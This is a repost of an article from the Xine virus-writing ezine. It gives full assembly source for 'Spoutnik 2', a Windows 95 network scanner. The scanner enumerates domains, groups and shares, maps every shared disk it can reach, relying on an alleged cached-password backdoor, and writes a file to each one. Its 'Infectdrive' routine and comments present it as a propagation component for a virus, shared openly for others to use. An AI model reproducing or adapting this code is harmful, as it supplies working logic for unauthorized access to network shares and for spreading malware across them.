Copy Link
Add to Bookmark
Report

Xine - issue #4 - Phile 302

eZine's profile picture
Published in 
Xine
 · 7 months ago

 
/-----------------------------\
| Xine - issue #4 - Phile 302 |
\-----------------------------/


;
; This scanner was build on this principe(ikx)
;
; if domain-server-generic found then scan again
; if connectable disk found then mount it
;
; This small application connect every sharable ressource on the network,
; despite of no password, windows seems to connect anyway the ressource.
; This was not previewved initially. Windows himself find and take
; the password from the cache ?
; Yeah, it's a win95 backD00r, it make things more simple but it hide
; password to the user himself, even the virus don't know the password
;
; This program show how to connect a drive (ikx)
; This program have also a fixed memory for scanning each type, then it
; can't perform a 100% true full tree, he will be limited somewhere...
;
; Spoutnik 3 will fix this problem
;
; This part of code was coded under windows95, tested on windows98
; KRRRASHED on windows NT
; So NT users, don't panic and reformat your drive, install windows95 and
; after you will be able to use that program
; Else , you can debug this program and send me the working version for NT
;
; I will not do it myself, I'm in time deficit you know....
;
; Greetz(×kx): Frederrico <- the Belgian Beer Killer! ;)
; and some s0 UnD4RGRooND PO3pl3 th4t N0bodY kn0\X/
;
; hope you enjoy the Code
; Ikx/Ikx(ikx1999)



.386
locals
.model flat

;Define the needed external functions and constants here.

extrn ExitProcess:PROC
extrn MessageBoxA:Proc
extrn WNetOpenEnumA:Proc
extrn WNetCloseEnum:Proc
extrn WNetEnumResourceA:Proc
extrn WNetAddConnection2A:Proc
extrn WNetCancelConnection2A:Proc
extrn GetCommandLineA:Proc
extrn MessageBoxA:Proc
extrn HeapCreate:Proc
extrn HeapAlloc:Proc
extrn HeapDestroy:Proc
extrn GetLastError:Proc
extrn CreateFileA:Proc
extrn WriteFile:Proc
extrn _lclose:Proc

.data ;the data area

Tempdrive: db 'Z'+1,':' ; but I will
tmpflag: db 0
Tempfile: db 'create.txt',0
iobytes: dd 0

Handle: dd 0
MemPointer: dd 0
MemHandle: dd 0
MemPointer2: dd 0
MemHandle2: dd 0
MemPointer3: dd 0
MemHandle3: dd 0
MemPointer4: dd 0
MemHandle4: dd 0


Password: dd 20 dup (0) ; hahaha I removed my password
db 800 dup (?)

.code ; executable code starts here

HOST:

Starthere:

call GetCommandLineA ; look if any password entered

mov esi,eax
dothattozero:
inc esi
cmp byte ptr [esi],20h ; if space then so
je thengother

cmp byte ptr [esi],0 ; if nothing then set default
jne dothattozero
jmp dothatanyway

thengother:
mov edi,offset Password ; set password

gototheree:
inc esi
inc edi
mov al,byte ptr [esi] ; get password characters
cmp al,0
je dothatanyway ; end of paswword ?

mov byte ptr [edi],al
jmp gototheree ; loop


dothatanyway:

mov edx,offset MemPointer ; alloc first memory for
mov ebx,0FFFFh/2 ; scanning
Call Alloc

mov edx,offset MemPointer2
mov ebx,0FFFFh/2
Call Alloc ; memory 2

mov edx,offset MemPointer3 ; memory 3
mov ebx,0FFFFh/2
Call Alloc

mov edx,offset MemPointer4 ; memory4
mov ebx,0FFFFh/2
Call Alloc

dec eax
jc Fini ; can't allocate, then finish!
inc eax

mov eax,0
mov ebx,dword ptr [MemPointer]
call Globalconnection ; open the connection to
; the global networks
jc Fini1 ; in order to scan ressources

Nextone:

mov eax,dword ptr [MemPointer]
Call EnumResource ; get all 1st entries
jc Fini ; generally the Domain
; or Generic
mov esi,dword ptr [MemPointer]
call scanall ; then we scan sub entries
jmp Nextone

scanall:
pushad ; we scan
mov ecx,dword ptr [esi+04] ; look to the Netressource
lea edi,[esi+0Ch] ; structure, looking for
; types...
scaneach:

push edi
push ecx
call scaneachtype ; Now we do the ring scanner
pop ecx
pop edi
add edi,32

loop scaneach
popad ; Ikx
ret

scaneachtype:

cmp dword ptr [edi+8],2 ; Scan for sharing ressource
je Scanshare ; not necessary disk but
; shared directories...
cmp dword ptr [edi+8],1
je Scangroup ; scan the group
cmp dword ptr [edi+8],3
je Infectdrive
cmp dword ptr [edi+8],6
je Scandomain ; scan the domain
ret

Scandomain:

mov ebx,dword ptr [MemPointer2]
mov eax,edi
call Globalconnection ;ask for connection...
jc scandomainfin


scandomain2:

mov eax,dword ptr [MemPointer2]
Call EnumResource ; ask for entries
jc scandomainfin

mov esi,dword ptr [MemPointer2]
call scanall ; scan subentries
jmp scandomain2

scandomainfin:

mov eax,dword ptr [MemPointer2]
call closeenum ; close the ennumeration
ret

Scangroup:

mov ebx,dword ptr [MemPointer3]
mov eax,edi
call Globalconnection ; scan the group
jc scangroupfin

scangroup2:

mov eax,dword ptr [MemPointer3]
Call EnumResource ; ask for entries
jc scangroupfin

mov esi,dword ptr [MemPointer3]
call scanall ; scan sub entries

jmp scangroup2

scangroupfin:

mov eax,dword ptr [MemPointer3]
call closeenum
ret

Scanshare:

cmp dword ptr [edi+20],0
je Nextone ; test if this is a remote things

mov ebx,dword ptr [MemPointer4]
mov eax,edi
call Globalconnection ; scan for sub connections
jc scanusefini ; in machine

scanuse2:

mov eax,dword ptr [MemPointer4]
Call EnumResource ; ask for entries
jc scanusefini

mov esi,dword ptr [MemPointer4]
call scanall

jmp scanuse2

scanusefini:

mov eax,dword ptr [MemPointer4]
call closeenum ; close enumeration
ret

Infectdrive:

mov dword ptr [edi+16],offset Tempdrive ; we have to set
; the Local name as a drive
; letter 'Ex:F: etc etc'
; here I choose to start
; from Z to go to A
dec byte ptr [Tempdrive]

push 0FF000000h ; persistant
push 0 ; default user...
push offset Password ; seems not really need
push edi ; the NEtressource table
Call WNetAddConnection2A ; Now we connect
cmp eax,0
jne Cantconnect

push large 0
push large 80h
push large 1 ; create allways new
push large 0
push large 0
push 80000000h or 40000000h ; create the file in read
push offset Tempdrive
mov byte ptr [tmpflag],'\' ; this just for F:\blabla
Call CreateFileA ; create a file
dec byte ptr [Tempdrive]
mov byte ptr [tmpflag],0
inc eax
jz Disconnect

dec eax
push eax

push 0
push offset iobytes
push 8
push offset Tempfile
push eax
Call WriteFile ; write 8 byte on the file
; close it
Call _lclose

Disconnect:

; push 0 ; NORMALLY WE HAVE TO CANCEL
; push 1 ; THE CONNECTION WHEN FINISH
; push offset Tempdrive
; Call WNetCancelConnection2A

Cantconnect:
inc byte ptr [Tempdrive]

ret

EnumResource:

lea ecx,[eax+8] ; heap organisation...

mov edx,32000
mov dword ptr [ecx],edx ;
push ecx ; buffer size

lea ecx,[eax+12]
push ecx ; buffer = heap +12

mov dword ptr [eax+4],-1
lea ecx,[eax+4]
push ecx ; number of entries = 0FFFFFFFh

push dword ptr [eax] ; handle
Call WNetEnumResourceA
add eax,-1
ret

closeenum:

push dword ptr [eax]
Call WNetCloseEnum
ret

Globalconnection:

mov ecx,2
jmp Netconnection

Contextconnection:

mov ecx,5

Netconnection:

push ebx
push eax
push large 3 ; fwdusage
push large 1 ; fwdtype , get only disks
push ecx ; fwdscope
call WNetOpenEnumA
add eax,-1
ret

Alloc: ; Hacked from Explorer.exe
; given with window95 Chicago
; ver 4.00.950 line#0040D0DE
; **normally** works with
push edx ; NT but allways...
push edx

push 0
push ebx
push 0
Call HeapCreate

pop edx
mov dword ptr [edx],eax

cmp eax,0
jz AllocBad

dec ebx
push ebx
push 8h
push eax
Call HeapAlloc

pop edx
mov dword ptr [edx+4],eax

ret

AllocBad: sub eax,-1
ret

Deloc:

push dword ptr [MemHandle]
Call HeapDestroy
push dword ptr [MemHandle2]
Call HeapDestroy

ret


Fini:

mov eax,dword ptr [MemPointer]
call closeenum ; finish global connection

Fini1:
call Deloc
cmp byte ptr [Tempdrive],'Z'+1
jne thenskipbox

push 0 ; put the small box if nutin
push offset BoxMsg2 ; connected
push offset BoxMsg
push 0
call MessageBoxA

thenskipbox:
push LARGE -1
call ExitProcess ;this simply terminates the program

BoxMsg2: db ' Spoutnik_2^ikx II{IkX}',0
BoxMsg: db ' No ressource connected!',10,13,10,13
db ' Correct syntax: spoutnik (password)',10,13
db ' Ex: spoutnik jennajameson',10,13,10,13
db 'Nota bene:password is not necesseary',10,13

ends
end HOST




← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT